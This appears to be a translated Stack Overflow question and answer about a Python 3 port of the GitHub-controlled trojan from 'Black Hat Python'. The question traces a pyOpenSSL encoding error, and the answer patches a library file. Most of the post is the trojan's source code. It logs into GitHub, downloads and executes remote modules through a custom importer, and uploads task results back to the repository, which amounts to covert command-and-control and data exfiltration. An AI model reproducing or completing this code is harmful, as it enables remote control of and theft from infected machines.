python-3.x - 回溯错误 : Lookup Error: unknown encoding charmap

标签 python-3.x encoding traceback

我正在关注 Justin Seitz 的书“Black Hat Python”。在本章中,我们将编写一个使用 GitHub 进行命令和控制并使用 github3.py 与 GitHub 交互的特洛伊木马。问题是这本书使用 python2,而我正试图在 python3 中进行。我收到回溯错误“查找错误:未知编码:charmap”。我该如何解决这个错误?

这是回溯:

Traceback (most recent call last):
  File "trojan.py", line 102, in <module>
    config = get_trojan_config()
  File "trojan.py", line 44, in get_trojan_config
    config_json = get_file_contents(trojan_config)
  File "trojan.py", line 30, in get_file_contents
    gh, repo, branch = connect_to_github()
  File "trojan.py", line 24, in connect_to_github
    repo = gh.repository("*redacted*", "*redacted*")
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/github3/github.py", line 1063, in repository
    json = self._json(self._get(url), 200)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/github3/models.py", line 130, in _get
    return self._session.get(url, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/sessions.py", line 521, in get
    return self.request('GET', url, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/github3/session.py", line 81, in request
    response = super(GitHubSession, self).request(*args, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/requests/adapters.py", line 440, in send
    timeout=timeout
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connectionpool.py", line 601, in urlopen
    chunked=chunked)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connectionpool.py", line 346, in _make_request
    self._validate_conn(conn)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connectionpool.py", line 850, in _validate_conn
    conn.connect()
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/connection.py", line 337, in connect
    cert = self.sock.getpeercert()
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/urllib3/contrib/pyopenssl.py", line 346, in getpeercert
    (('commonName', x509.get_subject().CN),),
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/OpenSSL/crypto.py", line 540, in __getattr__
    nid = _lib.OBJ_txt2nid(_byte_string(name))
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/OpenSSL/_util.py", line 112, in byte_string
    return s.encode("charmap")
LookupError: unknown encoding: charmap

这是源代码:

import json
import base64
import sys
import time
import importlib
import random
import threading
import queue
import os

from github3 import login

trojan_id = "abc"

trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
configured = False
task_queue = queue.Queue()


def connect_to_github():
    gh = login(username="", password="")
    repo = gh.repository("", "")
    branch = repo.branch("master")
    return gh, repo, branch


def get_file_contents(filepath):
    gh, repo, branch = connect_to_github()
    tree = branch.commit.commit.tree.recurse()

    for filename in tree.tree:
        if filepath in filename.path:
            print("[*] Found file %s", filepath)
            blob = repo.blob(filename._json_data['sha'])
            return blob.content

    return None


def get_trojan_config():
    global configured
    config_json = get_file_contents(trojan_config)
    config = json.load(base64.b64decode(config_json))
    configured = True

    for task in config:
        if task['module'] not in sys.modules:
            exec("import %s" % task['module'])
    return config


def store_module_result(data):
    gh, repo, branch = connect_to_github()
    remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
    repo.create_file(remote_path, "Commit  message", base64.b64encode(data))

    return


class GitImporter(object):


    def __init__(self):
        self.current_module_code = ""


    def find_module(self, fullname, path=None):
        if configured:
            print("[*] Attempting to retrieve %s" % fullname)
            new_library = get_file_contents("modules/%s" % fullname)

            if new_library is not None:
                self.current_module_code = base64.b64decode(new_library)
                return self
        return None


    def load_module(self, name):
        module = importlib.import_module(name)
        exec(self.current_module_code in module.__dict__)
        sys.modules[name] = module

        return module


def module_runner(module):
    task_queue.put(1)
    result = sys.modules[module].run()
    task_queue.get()

    store_module_result(result)

    return


sys.meta_path =[GitImporter()]

while True:
    if task_queue.empty():
        config = get_trojan_config()
        for task in config:
            t = threading.Thread(target=module_runner, args = (task['module'],))
            t.start()
            time.sleep(random.randint(1, 10))

为了隐私起见,我特意从源代码和回溯中编辑了个人身份信息。

最佳答案

对于这个问题,可以编辑文件:

/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/OpenSSL/_util.py

将导致错误的行修改为:

return s.encode()

关于python-3.x - 回溯错误 : Lookup Error: unknown encoding charmap,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/47605277/

相关文章:

python - 模块 `collections` 中的其他 26 个元素

python-3.x - Pygame 没有移动我在屏幕上绘制的矩形

ios - 来自字符串的 MD5 哈希值不匹配

c# - (new Utf8Encoding()).GetPreamble() 的前导为空 - 很奇怪

python - 重新引发异常时如何避免在 pytest 中显示原始异常?

python-3.x - 如何根据同一数据框中的另一列计算 Pandas 数据框中的值

python - 在 Python 中,赋值运算符在类方法定义中作为默认值传递时是否访问类或实例变量?

java - ASN1解码器(libtasn1-3.3)打印DD证书pem的内容

python - 如何捕获所有未捕获的异常并继续?

python:使用故障处理程序有缺点吗?